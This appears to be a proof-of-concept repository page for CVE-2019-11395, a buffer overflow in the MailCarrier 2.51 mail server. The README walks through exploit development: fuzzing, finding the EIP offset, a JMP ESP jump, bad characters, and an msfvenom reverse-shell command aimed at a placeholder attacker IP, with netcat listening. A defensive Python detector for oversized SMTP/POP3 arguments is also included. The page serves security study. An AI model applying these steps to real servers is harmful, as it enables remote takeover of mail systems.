
CVE-2019-11395 PoC — Taps Lab MailCarrier buffer error vulnerability

Associated Vulnerability
Title: Taps Lab MailCarrier buffer error vulnerability (CVE-2019-11395)
Description: Taps Lab MailCarrier is a mail server for the Windows Server platform made by the Korean company Taps Lab. The product supports protocols such as SMTP, POP3 and IMAP. Taps Lab MailCarrier 2.51 contains a buffer overflow vulnerability. The flaw arises because the software does not correctly validate data boundaries when operating on memory, causing erroneous reads or writes to other, adjacent memory locations. An attacker could exploit this vulnerability to cause a buffer overflow or heap overflow.
Description
Proof of concept written for the academic purpose of understanding the buffer overflow vulnerability, using CVE-2019-11395 as its background.
Readme
# CVE-2019-11395

## Overview

This Proof of Concept (PoC) demonstrates a **Buffer Overflow vulnerability** in MailCarrier 2.51, allowing remote attackers to execute arbitrary code via a long string. The vulnerability can be exploited using the following processes:

- `SMTP RCPT TO`
- `POP3 USER`
- `POP3 LIST`
- `POP3 TOP`
- `POP3 RETR`

The project aims to provide an **academic approach** to understanding how Buffer Overflow works.

---

## ⚠️ Warnings

Before running any tests, **never use your production environment** for initial experimentation. Instead, create a **lab setup** similar to your production environment to **avoid any issues or unintended consequences**.

---

## 🔧 Preparation

### 1. Discover the Vulnerability
- Use the **fuzzing technique** to determine the approximate number of bytes required to crash the application.

### 2. Find the Offset
- Once the crash occurs, use:
  ```bash
  msf-pattern_create -l <number_of_bytes>
  ```
  This helps determine the Offset, which is the exact number of bytes needed to overwrite the `EIP`.
- Use the following command to confirm the Offset:
  ```bash
  msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
  ```
  This identifies the exact byte count required to control the `EIP`.

### 3. Find a JMP or CALL Instruction
- Locate an instruction such as:
  ```asm
  JMP ESP
  CALL ESP
  ```
  We will use this address to redirect execution. Be cautious with ASLR, SafeSEH, or other protection mechanisms.

### 4. Identify bad chars
- Use the Mona tool within Immunity Debugger to check for bad characters.

### 5. Generate Shellcode
- Create shellcode while excluding bad characters:
  ```bash
  msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
  ```

### 6. Add NOPs
- Insert `NOP` (`\x90`) instructions into the payload to improve stability.

### 7. Establish a connection
- Use `netcat` (`nc`) to listen for the reverse shell connection from the target.
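As an added defender-side example (not code from the PoC repository), the following Python flags the oversized or NOP-laden arguments that the five listed commands (`SMTP RCPT TO`, `POP3 USER`, `LIST`, `TOP`, `RETR`) would carry when a long string is sent; the length limits are assumed rather than taken from the advisory, and the sample lines are constructed.

```python
"""Added example, not code from the PoC repository: flag oversized or
binary-laden arguments to the MailCarrier commands the README lists (SMTP
RCPT TO, POP3 USER/LIST/TOP/RETR). Limits are assumed, not from the advisory."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Watched commands with a generous legitimate argument length (assumed;
# RFC 5321 caps a forward-path at 256 octets, POP3 arguments are shorter).
WATCHED = {
    ("SMTP", "RCPT"): 320,
    ("POP3", "USER"): 128,
    ("POP3", "LIST"): 16,
    ("POP3", "TOP"): 32,
    ("POP3", "RETR"): 16,
}
NOP_SLED = re.compile(rb"\x90{8,}")  # run of x86 NOPs (README step 6 padding)

@dataclass
class Finding:
    protocol: str
    command: str
    arg_len: int
    reason: str

def inspect_command(protocol: str, raw: bytes) -> Optional[Finding]:
    """Return a Finding if a watched command carries a suspicious argument."""
    parts = raw.rstrip(b"\r\n").split(None, 1)
    if not parts:
        return None
    cmd = parts[0].upper().decode("ascii", "replace")
    arg = parts[1] if len(parts) > 1 else b""
    limit = WATCHED.get((protocol, cmd))
    if limit is None:
        return None  # not one of the overflow vectors listed above
    if len(arg) > limit:
        return Finding(protocol, cmd, len(arg), f"argument exceeds {limit} bytes")
    if NOP_SLED.search(arg):
        return Finding(protocol, cmd, len(arg), "NOP sled in argument")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if arg and nonprint / len(arg) > 0.3:
        return Finding(protocol, cmd, len(arg), "mostly non-printable bytes")
    return None

def scan_session(protocol: str, lines: List[bytes]) -> List[Finding]:
    return [f for f in (inspect_command(protocol, l) for l in lines) if f]

if __name__ == "__main__":  # constructed sample: benign line, then oversized RCPT TO
    for f in scan_session("SMTP", [b"RCPT TO:<b@lab.example>\r\n", b"RCPT TO:" + b"A" * 600 + b"\r\n"]):
        print(f)
```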
File Snapshot

[4.0K] /data/pocs/22cc003a05711006acc239c62d87e71a7f14db62
├── [ 891] CVE–2019–11395.py
└── [1.9K] README.md

0 directories, 2 files